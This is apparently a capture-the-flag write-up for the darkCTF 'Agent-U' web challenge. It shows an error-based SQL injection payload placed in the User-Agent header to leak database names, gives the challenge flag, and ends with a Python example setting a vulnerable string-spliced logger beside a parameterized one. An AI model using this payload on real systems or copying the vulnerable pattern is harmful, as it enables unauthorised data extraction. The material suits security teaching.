Web/Agent-U
395 points
Agent U stole a database from my company but I don’t know which one. Can u help me to find it?
http://agent.darkarmy.xyz/
flag format darkCTF{databasename}
Solution
From the source we learn that the default credentials are admin/admin.
After login the site shows my user agent, so my first idea was to perform SQL injection through my user agent.
After a few attempts I finally ended up with the user agent below ;-)
', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .
BINGO!
darkCTF{ag3ntu1sv3ryt3l3nt3d}
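
For the defensive side, the following is an added example, not the challenge's own code: it shows a User-Agent logger that splices the header into an INSERT statement next to one that binds it as a parameter, fed with the payload from this write-up. Assumptions: SQLite stands in for the challenge's MySQL back end (so the spliced statement fails on the unknown functions instead of returning an error-based leak), and the table, column and function names are hypothetical.

```python
import sqlite3

# Payload copied from the write-up above (the User-Agent header value).
PAYLOAD = ("', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) "
           "FROM information_schema.schemata LIMIT 1,1))), NULL); -- .")

def make_db():
    # Hypothetical three-column log table; the challenge's real schema is not shown.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (user_agent TEXT, ip TEXT, username TEXT)")
    return db

def log_visit_vulnerable(db, user_agent, ip, username):
    # The header is spliced into the SQL text, so a quote in it ends the string
    # literal and the rest of the header is parsed as SQL.
    sql = ("INSERT INTO visits (user_agent, ip, username) "
           f"VALUES ('{user_agent}', '{ip}', '{username}')")
    db.execute(sql)

def log_visit_safe(db, user_agent, ip, username):
    # Placeholders keep the header as data, whatever characters it contains.
    db.execute("INSERT INTO visits (user_agent, ip, username) VALUES (?, ?, ?)",
               (user_agent, ip, username))

def handle_request(db, log_fn, user_agent):
    # Return a generic message on failure: echoing the database error to the
    # client is what makes error-based extraction possible.
    try:
        log_fn(db, user_agent, "203.0.113.7", "admin")  # constructed sample values
        return "ok"
    except sqlite3.Error:
        return "internal error"

def demo():
    db = make_db()
    vulnerable = handle_request(db, log_visit_vulnerable, PAYLOAD)
    safe = handle_request(db, log_visit_safe, PAYLOAD)
    stored = [row[0] for row in db.execute("SELECT user_agent FROM visits")]
    return vulnerable, safe, stored

if __name__ == "__main__":
    print(demo())
```

The spliced version hands the header to the SQL parser, while the parameterized version stores the same string verbatim as a single row.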